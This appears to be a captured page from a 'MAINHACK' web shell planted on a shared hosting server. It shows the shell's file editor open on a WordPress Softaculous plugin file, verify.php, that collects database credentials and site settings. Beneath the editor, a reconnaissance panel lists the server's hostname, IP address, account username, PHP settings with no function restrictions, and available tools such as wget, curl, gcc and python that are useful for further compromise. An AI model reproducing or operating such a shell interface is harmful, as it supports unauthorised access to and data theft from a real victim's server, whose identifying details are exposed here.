[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: verify.php
<?php if (!defined('ABSPATH')){ exit; } function softaculous_verify($auth_key = ''){ global $softaculous_lang, $wpdb, $wp_version, $softaculous_wp_config, $softaculous_error; $return = array(); $site_settings = array(); $site_settings['ver'] = $wp_version; $site_settings['softpath'] = rtrim(get_home_path(), '/'); $site_settings['siteurl'] = get_option('siteurl'); $site_settings['adminurl'] = admin_url(); $site_settings['softdb'] = $softaculous_wp_config['softdb']; $site_settings['softdbuser'] = $softaculous_wp_config['softdbuser']; $site_settings['softdbhost'] = $softaculous_wp_config['softdbhost']; $site_settings['softdbpass'] = $softaculous_wp_config['softdbpass']; $site_settings['dbprefix'] = $softaculous_wp_config['dbprefix']; $site_settings['site_name'] = get_option('blogname'); $site_settings['auth_key'] = (!empty($auth_key) ? $auth_key : ''); //Fetch all the table names $sql = "SHOW TABLES FROM ".$softaculous_wp_config['softdb']; $results = $wpdb->get_results($sql); $site_settings['softdbtables'] = array(); foreach($results as $index => $value) { foreach($value as $tableName) { $site_settings['softdbtables'][] = $tableName; } } $site_settings['wpc_backupdir'] = $softaculous_wp_config['uploads_dir'].'/softaculous_backups_'.(!empty($auth_key) ? $auth_key : softaculous_optREQ('auth_key')); $site_settings['createdir'] = softaculous_can_createdir($site_settings['wpc_backupdir']); $site_settings['wpc_ver'] = softaculous_fetch_version(); $return['data'] = $site_settings; softaculous_connectok(); echo wp_json_encode($return); }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium56.web-hosting.com
Server IP: 198.54.119.70
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium56.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 70.32 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: bkunreyz
User ID (UID): 830
Group ID (GID): 826
Script Owner UID: 830
Current Dir Owner: 830